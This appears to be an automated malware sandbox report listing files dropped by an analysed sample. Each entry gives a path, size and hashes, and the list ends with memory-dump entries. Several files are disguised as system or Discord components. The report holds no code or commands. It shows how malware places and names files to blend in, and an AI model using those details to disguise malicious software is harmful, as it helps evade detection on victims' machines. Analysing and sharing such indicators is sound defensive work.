003c646d0f66ec7ca7b175abb734cac3ffa89b8582144aff7078b158ef5248d96f4fcb718ce402f84314482ee44126eee4a2cb3e9cb9013b1d42d81472c2f1b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\f0uqbs3k.dll
Filesize
76KB

MD5
73e071e2bc5ac185bf9c3e44ea4fb346

SHA1
55a37bc4ed482cc673faef39854eb35be933d266

SHA256
42a5c18978fab7808c41aaf9fe43196a02e1cdcc2c7cc3afd9fc913e0825a0b9

SHA512
c00a78ee12067d7de2c15a277d5a94a37c18884ad94f4d97648a890a5298dc23427130b5fb6c7205362267fc76c5adae8bf823840b8fc8ece3b1c577e58d1c6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\orc.exe
Filesize
916KB

MD5
ac0431f34683bcbbb2cf23aaf29ea8cf

SHA1
275ec0e362cb074d5f080aaa41c25a8ecebe3205

SHA256
1780430ff5ad71b8c89b9c59d2924b16cb7fd07da479b8b394846c792f7523cb

SHA512
156da3158d29d293daf9a74cf04d855ec162836fef87473afcc861688630f2da01234e1f40a4f84235ba457c0a6ae1770c3cc55fb0375cbea6813d0186a87b9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\orc.exe
Filesize
916KB

MD5
ac0431f34683bcbbb2cf23aaf29ea8cf

SHA1
275ec0e362cb074d5f080aaa41c25a8ecebe3205

SHA256
1780430ff5ad71b8c89b9c59d2924b16cb7fd07da479b8b394846c792f7523cb

SHA512
156da3158d29d293daf9a74cf04d855ec162836fef87473afcc861688630f2da01234e1f40a4f84235ba457c0a6ae1770c3cc55fb0375cbea6813d0186a87b9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp8F25.vbs
Filesize
74KB

MD5
0c2a7204dd6c378451e6ca6985802a22

SHA1
a29982b623533bff6638053e27b9ed462196b82e

SHA256
536be654e06c9e81282d106ecd7aab29ad273fdbd7bdc62a2acfe919060614d2

SHA512
20273ddb38596ff9ac5cd3f1d057890cdb0a8b53b3a91bfb33d271c3dddaac8a4e9b5cb8dce634ad06a682c0f6c952a8b41c17ecb92b51e9d9dd39468ac6f5f8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\FILE.exe
Filesize
18KB

MD5
89ad448d079c97e6223bd48892a4c8b1

SHA1
c864447470fe553ccbb0574f8596200c72283145

SHA256
2ad50133104bbae5d82e85737296e39eecbfec15c270afd2a3b6aa981d53215f

SHA512
ad594497d29d3eebddc6ca56bc9cd5ae64fd5c27fb1087634e198e846cdaa92fa60043ee64d9712b45d8833d7485c64f7bfab3a1cdbb3bee0c8d02125d47562c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\FILE.exe
Filesize
18KB

MD5
89ad448d079c97e6223bd48892a4c8b1

SHA1
c864447470fe553ccbb0574f8596200c72283145

SHA256
2ad50133104bbae5d82e85737296e39eecbfec15c270afd2a3b6aa981d53215f

SHA512
ad594497d29d3eebddc6ca56bc9cd5ae64fd5c27fb1087634e198e846cdaa92fa60043ee64d9712b45d8833d7485c64f7bfab3a1cdbb3bee0c8d02125d47562c

Download Submit
C:\Users\Admin\AppData\Roaming\Watchdog.exe
Filesize
9KB

MD5
913967b216326e36a08010fb70f9dba3

SHA1
7b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf

SHA256
8d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a

SHA512
c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33

Download Submit
C:\Users\Admin\AppData\Roaming\Watchdog.exe
Filesize
9KB

MD5
913967b216326e36a08010fb70f9dba3

SHA1
7b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf

SHA256
8d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a

SHA512
c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33

Download Submit
C:\Users\Admin\AppData\Roaming\Watchdog.exe
Filesize
9KB

MD5
913967b216326e36a08010fb70f9dba3

SHA1
7b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf

SHA256
8d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a

SHA512
c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33

Download Submit
C:\Users\Admin\AppData\Roaming\Watchdog.exe.config
Filesize
357B

MD5
a2b76cea3a59fa9af5ea21ff68139c98

SHA1
35d76475e6a54c168f536e30206578babff58274

SHA256
f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839

SHA512
b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad

Download Submit
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
Filesize
967KB

MD5
b63bb68654e7be72058398809d6c4754

SHA1
4a7b43488029a2d4c960c9ee4431b99c8640a4b0

SHA256
8db43542d501e7d65d0f1db96785d875bc7da5a51a76ae943fcd3222b66412fe

SHA512
c67280896aa63894933a6058d17a2eb9cea484f5293c095704baaf9f177d9e2779951d803548294584070eb95a3428b52eec9fd5fc1a7da74a6305e7c496e48a

Download Submit
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
Filesize
967KB

MD5
b63bb68654e7be72058398809d6c4754

SHA1
4a7b43488029a2d4c960c9ee4431b99c8640a4b0

SHA256
8db43542d501e7d65d0f1db96785d875bc7da5a51a76ae943fcd3222b66412fe

SHA512
c67280896aa63894933a6058d17a2eb9cea484f5293c095704baaf9f177d9e2779951d803548294584070eb95a3428b52eec9fd5fc1a7da74a6305e7c496e48a

Download Submit
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
Filesize
967KB

MD5
b63bb68654e7be72058398809d6c4754

SHA1
4a7b43488029a2d4c960c9ee4431b99c8640a4b0

SHA256
8db43542d501e7d65d0f1db96785d875bc7da5a51a76ae943fcd3222b66412fe

SHA512
c67280896aa63894933a6058d17a2eb9cea484f5293c095704baaf9f177d9e2779951d803548294584070eb95a3428b52eec9fd5fc1a7da74a6305e7c496e48a

Download Submit
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
Filesize
967KB

MD5
b63bb68654e7be72058398809d6c4754

SHA1
4a7b43488029a2d4c960c9ee4431b99c8640a4b0

SHA256
8db43542d501e7d65d0f1db96785d875bc7da5a51a76ae943fcd3222b66412fe

SHA512
c67280896aa63894933a6058d17a2eb9cea484f5293c095704baaf9f177d9e2779951d803548294584070eb95a3428b52eec9fd5fc1a7da74a6305e7c496e48a

Download Submit
C:\Users\Admin\AppData\Roaming\discordnitro\winmgr.exe
Filesize
967KB

MD5
b63bb68654e7be72058398809d6c4754

SHA1
4a7b43488029a2d4c960c9ee4431b99c8640a4b0

SHA256
8db43542d501e7d65d0f1db96785d875bc7da5a51a76ae943fcd3222b66412fe

SHA512
c67280896aa63894933a6058d17a2eb9cea484f5293c095704baaf9f177d9e2779951d803548294584070eb95a3428b52eec9fd5fc1a7da74a6305e7c496e48a

Download Submit
C:\Users\Admin\Downloads\plage.exe
Filesize
967KB

MD5
b03ccade490854df220914c4430967e2

SHA1
1911a59e8c4b427d3fbc8fc9c794886bd2d81305

SHA256
81cb1fa3507209f360261e795cc68622c4163cbb0c6082dc7d8358a04492f961

SHA512
0c05ff99f2d2f448c431073b9a339e6dc1ccab43c9442be44edfd493c3d4d9bd604a0deb792b91295571817113c309bafc6d230b470a4874493561bd5aa9bc36

Download Submit
C:\Users\Admin\Downloads\plage.exe
Filesize
967KB

MD5
b03ccade490854df220914c4430967e2

SHA1
1911a59e8c4b427d3fbc8fc9c794886bd2d81305

SHA256
81cb1fa3507209f360261e795cc68622c4163cbb0c6082dc7d8358a04492f961

SHA512
0c05ff99f2d2f448c431073b9a339e6dc1ccab43c9442be44edfd493c3d4d9bd604a0deb792b91295571817113c309bafc6d230b470a4874493561bd5aa9bc36

Download Submit
C:\Windows\SysWOW64\WindowsInput.exe
Filesize
21KB

MD5
e6fcf516d8ed8d0d4427f86e08d0d435

SHA1
c7691731583ab7890086635cb7f3e4c22ca5e409

SHA256
8dbe814359391ed6b0b5b182039008cf1d00964da9fbc4747f46242a95c24337

SHA512
c496cf8e2e222fe1e19051b291e6860f31aae39f54369c1c5e8c9758c4b56e8af904e3e536e743a0a6fdbbf8478afba4baee92e13fc1b3073376ac6bf4a7948e

Download Submit
C:\Windows\SysWOW64\WindowsInput.exe
Filesize
21KB

MD5
e6fcf516d8ed8d0d4427f86e08d0d435

SHA1
c7691731583ab7890086635cb7f3e4c22ca5e409

SHA256
8dbe814359391ed6b0b5b182039008cf1d00964da9fbc4747f46242a95c24337

SHA512
c496cf8e2e222fe1e19051b291e6860f31aae39f54369c1c5e8c9758c4b56e8af904e3e536e743a0a6fdbbf8478afba4baee92e13fc1b3073376ac6bf4a7948e

Download Submit
C:\Windows\SysWOW64\WindowsInput.exe
Filesize
21KB

MD5
e6fcf516d8ed8d0d4427f86e08d0d435

SHA1
c7691731583ab7890086635cb7f3e4c22ca5e409

SHA256
8dbe814359391ed6b0b5b182039008cf1d00964da9fbc4747f46242a95c24337

SHA512
c496cf8e2e222fe1e19051b291e6860f31aae39f54369c1c5e8c9758c4b56e8af904e3e536e743a0a6fdbbf8478afba4baee92e13fc1b3073376ac6bf4a7948e

Download Submit
C:\Windows\SysWOW64\WindowsInput.exe.config
Filesize
357B

MD5
a2b76cea3a59fa9af5ea21ff68139c98

SHA1
35d76475e6a54c168f536e30206578babff58274

SHA256
f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839

SHA512
b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA194.tmp
Filesize
676B

MD5
b6e99b1dc497c7bd58d8c9f0a8dbe6ee

SHA1
84b7ae03c91edf61a1ffcbc18d84f69ebcafce91

SHA256
fc34f92975e8f221866256880444b15a4c771d04ea25119c79cfdf1a5c9a76ce

SHA512
0b07978cf5d26686376ba6ed3b200f5f5046a3cedf3fcbff5ace1844d6985333cd134453b93b0b23e6c0d122bc0ac155466ad6b638ee21d9eb92623697f4b937

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f0uqbs3k.0.cs
Filesize
208KB

MD5
b910c3a2dad52238b921f2b74723f208

SHA1
d0a4f7ec596429b0a26749258991c6cf51397b54

SHA256
562799256c8413cdcb31ffe88542afc6ad957980901f30bd4d74382df4a785d2

SHA512
cf89df8734a9e8217753ca38fa0145fe60f081726ea2235169be006e9fa994a11d8a87777de39d6622ded0981642fcd334ac3307c6c5758f2995228e0945d055

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\f0uqbs3k.cmdline
Filesize
349B

MD5
40367ca8bc76f73d4a46116441245dfc

SHA1
76b2e48d3584acac300e5136e3259f1e67000336

SHA256
42541066730049f8010d27f06488bc1912ee1fc08c99a192e192a6d719ceefd8

SHA512
2afa278c62a8e9c52847daf655ef2ce3390e242e9ca25a8378153c4b07101efacb58963c88eebc52a95e5c49c6015a26177cc4ee7e09ce8bb3e33ddc7138db09

Download Submit
memory/436-160-0x0000000000000000-mapping.dmp

Download
memory/640-190-0x0000000000000000-mapping.dmp

Download
memory/640-196-0x00000000001E0000-0x00000000001E8000-memory.dmp

Filesize
32KB

Download
memory/804-164-0x0000000000000000-mapping.dmp

Download
memory/1556-202-0x00007FFA9F6E0000-0x00007FFAA01A1000-memory.dmp

Filesize
10.8MB

Download
memory/1556-201-0x00007FFA9F6E0000-0x00007FFAA01A1000-memory.dmp

Filesize
10.8MB

Download
memory/1944-137-0x0000000000000000-mapping.dmp

Download
memory/2172-132-0x00007FFAA0A50000-0x00007FFAA1486000-memory.dmp

Filesize
10.2MB

Download
memory/2544-186-0x0000022717590000-0x0000022718051000-memory.dmp

Filesize
10.8MB

Download
memory/2544-178-0x0000000000000000-mapping.dmp

Download
memory/2544-194-0x0000022717590000-0x0000022718051000-memory.dmp

Filesize
10.8MB

Download
memory/2660-154-0x0000000000000000-mapping.dmp

Download
memory/2736-142-0x0000000000000000-mapping.dmp

Download
memory/2848-198-0x0000000000000000-mapping.dmp

Download
memory/3060-209-0x00000194C5280000-0x00000194C5D41000-memory.dmp

Filesize
10.8MB

Download
memory/3060-208-0x00000194C5280000-0x00000194C5D41000-memory.dmp

Filesize
10.8MB

Download
memory/3148-200-0x0000029BF1D50000-0x0000029BF1DC6000-memory.dmp

Filesize
472KB

Download
memory/3148-179-0x0000000000000000-mapping.dmp

Download
memory/3148-207-0x0000029BF0950000-0x0000029BF1411000-memory.dmp

Filesize
10.8MB

Download
memory/3148-187-0x0000029BF1810000-0x0000029BF1854000-memory.dmp

Filesize
272KB

Download
memory/3148-189-0x0000029BF0950000-0x0000029BF1411000-memory.dmp

Filesize
10.8MB

Download
memory/3340-144-0x0000000000000000-mapping.dmp

Download
memory/3608-204-0x00007FFA9F6E0000-0x00007FFAA01A1000-memory.dmp

Filesize
10.8MB

Download
memory/3608-176-0x00007FFA9F6E0000-0x00007FFAA01A1000-memory.dmp

Filesize
10.8MB

Download
memory/3608-177-0x000000001AB90000-0x000000001AC9A000-memory.dmp

Filesize
1.0MB

Download
memory/3960-188-0x00007FFA9F6E0000-0x00007FFAA01A1000-memory.dmp

Filesize
10.8MB

Download
memory/3960-180-0x0000000000000000-mapping.dmp

Download
memory/3960-184-0x0000000000150000-0x000000000023A000-memory.dmp

Filesize
936KB

Download
memory/3960-206-0x00007FFA9F6E0000-0x00007FFAA01A1000-memory.dmp

Filesize
10.8MB

Download
memory/4164-141-0x00007FFA9FF80000-0x00007FFAA0A41000-memory.dmp

Filesize
10.8MB

Download
memory/4164-197-0x0000000000000000-mapping.dmp

Download
memory/4164-138-0x0000000000000000-mapping.dmp

Download
memory/4508-155-0x0000000000000000-mapping.dmp

Download
memory/4584-147-0x0000000000000000-mapping.dmp

Download
memory/4584-150-0x00007FFAA0A50000-0x00007FFAA1486000-memory.dmp

Filesize
10.2MB

Download
memory/4592-174-0x00007FFA9F6E0000-0x00007FFAA01A1000-memory.dmp

Filesize
10.8MB

Download
memory/4592-167-0x0000000000000000-mapping.dmp

Download
memory/4592-171-0x0000000000340000-0x000000000034C000-memory.dmp

Filesize
48KB

Download
memory/4592-172-0x0000000000980000-0x0000000000992000-memory.dmp

Filesize
72KB

Download
memory/4592-173-0x0000000000C40000-0x0000000000C7C000-memory.dmp

Filesize
240KB

Download
memory/4652-151-0x0000000000000000-mapping.dmp

Download
memory/4760-157-0x0000000000000000-mapping.dmp

Download
memory/4924-136-0x00007FFA9FEC0000-0x00007FFAA0981000-memory.dmp

Filesize
10.8MB

Download
memory/4924-135-0x000001ED72AE0000-0x000001ED72B02000-memory.dmp

Filesize
136KB

Download
memory/4924-134-0x00007FFA9FEC0000-0x00007FFAA0981000-memory.dmp

Filesize
10.8MB

Download
memory/4924-133-0x0000000000000000-mapping.dmp

Download